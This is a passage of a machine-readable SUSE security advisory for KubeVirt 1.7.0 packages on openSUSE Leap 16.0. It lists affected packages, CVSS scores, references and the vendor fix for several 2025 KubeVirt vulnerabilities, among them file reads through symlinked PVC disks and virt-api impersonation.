"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-handler-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-launcher-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-operator-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-synchronization-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virtctl-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:obs-service-kubevirt_containers_meta-1.7.0-160000.1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T08:51:11Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64435",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64435"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.7.0-beta.0, a logic flaw in the virt-controller allows an attacker to disrupt the control over a running VMI by creating a pod with the same labels as the legitimate virt-launcher pod associated with the VMI. This can mislead the virt-controller into associating the fake pod with the VMI, resulting in incorrect status updates and potentially causing a DoS (Denial-of-Service). This vulnerability is fixed in 1.7.0-beta.0.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-container-disk-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-manifests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-pr-helper-conf-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-sidecar-shim-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-tests-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-api-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-controller-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.aarch64",
"openSUSE Leap 16.0:kubevirt-virt-exportproxy-1.7.0-160000.1.1.x86_64",
"openSUSE Leap 16.0:kubevirt-virt-exportserver-1.7.0-160000.1.1.aarch64",
